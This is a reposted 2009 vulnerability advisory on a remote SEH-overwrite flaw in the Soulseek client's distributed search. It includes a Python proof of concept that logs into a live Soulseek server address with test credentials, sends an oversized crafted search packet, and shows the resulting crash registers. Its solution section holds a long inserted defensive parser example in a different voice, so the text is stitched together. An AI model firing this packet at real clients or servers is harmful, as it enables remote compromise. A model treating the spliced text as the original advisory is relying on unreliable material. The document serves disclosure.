Soulseek 157 NS */ 156.* Remote Distributed Search Code Execution
Source: vfocus.net  Author: vfocus  Published: 2009-05-27
=============================================
- Release date: May 24th, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file 
sharing application.
One of the things that makes Soulseek(tm) unique is our community and 
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make 
new friends and expand your mind!"

III. DESCRIPTION
-------------------------
The Soulseek client allows a distributed file search to be sent to one user, to
everyone, or to a specific Soulseek IRC channel, so a user can look for the files
he wants among his contacts, within a dedicated channel, or across the whole network.
Unfortunately, this feature is vulnerable to a remote SEH overwrite that can be
triggered against a specific user, or even against an entire Soulseek IRC channel.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept is made to prevent an S-K party: it is only built to
target the user "testt4321".

To try this proof of concept, you would have to open a soulseek client and use
the username:
"testt4321"
with the password:
"12345678"
And launch this code.
If you want to change the username or target a whole channel, you would have
to reverse the protocol :)

#!/usr/bin/python
import struct
import sys, socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch

# First message: login to the Soulseek server
buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"

s.send(buffer)
sleep(1) 

# Second message: distributed search directed at the user "testt4321"
junk = "\x41" * 3084
next_seh = struct.pack('<L', 0x42424242)
seh =      struct.pack('<L', 0x43434343)
other_junk = "\x61" * 1423

buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer2)
sleep(1)
s.recv(1024)

After the query is sent, the stack memory looks like this:
0012FBE4   41414141
0012FBE8   42424242  Pointer to next SEH record
0012FBEC   43434343  SE handler
0012FBF0   61616161

and the program crashes with the following register state:
EAX 00000000
ECX 43434343
EDX 7C9132BC ntdll.7C9132BC
EBX 00000000
ESP 0012EA78
EBP 0012EA98
ESI 00000000
EDI 00000000
EIP 43434343


V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client connected to
the Soulseek network.

VI. SYSTEMS AFFECTED
-------------------------
Windows all versions

VII. SOLUTION
-------------------------
A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/),
a Soulseek client written in Python.
Another quick workaround at server level would be to limit the search query length.
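The server-side workaround above amounts to refusing to relay a search whose query string is longer than any legitimate search needs. The following is an added example, not code from the advisory or from Soulseek: a small bounds-checked decoder plus a relay filter for a simplified, assumed message framing ([u32 body length][u32 code][length-prefixed user][u32 token][length-prefixed query], little-endian). The framing, the message code value 42, and the MAX_QUERY_LEN policy are assumptions for illustration, not the real Soulseek wire format; the three sample messages are constructed in the code.

```python
import struct

# Constructed policy value for this example: the longest query the relay will
# forward. A real deployment would tune this to observed legitimate usage.
MAX_QUERY_LEN = 256


class MalformedMessage(ValueError):
    """Raised when a message's declared lengths do not match its bytes."""


def read_u32(buf, off):
    """Read a little-endian u32 at off, refusing to read past the buffer."""
    if off + 4 > len(buf):
        raise MalformedMessage("truncated u32 at offset %d" % off)
    return struct.unpack_from("<I", buf, off)[0], off + 4


def read_string(buf, off):
    """Read a u32-length-prefixed byte string, bounds-checked against buf."""
    n, off = read_u32(buf, off)
    if n > len(buf) - off:
        raise MalformedMessage(
            "declared string length %d exceeds %d remaining bytes" % (n, len(buf) - off))
    return buf[off:off + n], off + n


def parse_search(msg):
    """Parse one message in the assumed framing:
    [u32 body_len][u32 code][str user][u32 token][str query]."""
    body_len, off = read_u32(msg, 0)
    if body_len != len(msg) - 4:
        raise MalformedMessage(
            "declared body length %d, actual %d" % (body_len, len(msg) - 4))
    code, off = read_u32(msg, off)
    user, off = read_string(msg, off)
    token, off = read_u32(msg, off)
    query, off = read_string(msg, off)
    if off != len(msg):
        raise MalformedMessage("%d trailing bytes after query" % (len(msg) - off))
    return {"code": code, "user": user, "token": token, "query": query}


def build_search(code, user, token, query):
    """Encode a message in the same assumed framing (used to build samples)."""
    body = (struct.pack("<I", code)
            + struct.pack("<I", len(user)) + user
            + struct.pack("<I", token)
            + struct.pack("<I", len(query)) + query)
    return struct.pack("<I", len(body)) + body


def filter_search(msg, max_query_len=MAX_QUERY_LEN):
    """Decide whether a search may be relayed. Returns (accept, reason)."""
    try:
        fields = parse_search(msg)
    except MalformedMessage as exc:
        return False, "malformed: %s" % exc
    qlen = len(fields["query"])
    if qlen > max_query_len:
        return False, "query length %d exceeds limit %d" % (qlen, max_query_len)
    return True, "ok"


# Constructed samples (not captured traffic); 42 is a placeholder code value.
SAMPLE_OK = build_search(42, b"alice", 0x1234, b"radiohead creep")
SAMPLE_OVERSIZED = build_search(42, b"alice", 0x1234, b"A" * 4000)
# Cutting the tail makes the declared body length disagree with the bytes.
SAMPLE_TRUNCATED = SAMPLE_OK[:-6]

if __name__ == "__main__":
    for name, sample in (("ok", SAMPLE_OK), ("oversized", SAMPLE_OVERSIZED),
                         ("truncated", SAMPLE_TRUNCATED)):
        accept, reason = filter_search(sample)
        print("%-10s accept=%s (%s)" % (name, accept, reason))
```

Two checks matter here: every declared length is validated against the bytes actually present before it is used, so inconsistent framing is rejected rather than trusted, and the query length is compared against a policy limit before the message is forwarded to any client. Rejections from either check are also a useful logging point for spotting abuse of the search feature.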

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-------------------------
May 24, 2009: Initial release


XI. DISCLOSURE TIMELINE
-------------------------
July      29, 2008: Bug discovered
September 03, 2008: Vendor contacted; no response.
October   14, 2008: Vendor contacted; still no response.
April     12, 2009: Idefense contacted.
April     13, 2009: Idefense answered.
April     23, 2009: Advisory sent to iDefense contributor program.
May       13, 2009: Idefense contacted, bug rejected (no reason given)
May       15, 2009: Idefense recontacted; no answer.
May       16, 2009: Last try to contact Soulseek maintainers
May       24, 2009: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or 
misuse of this information.

# [2009-05-26]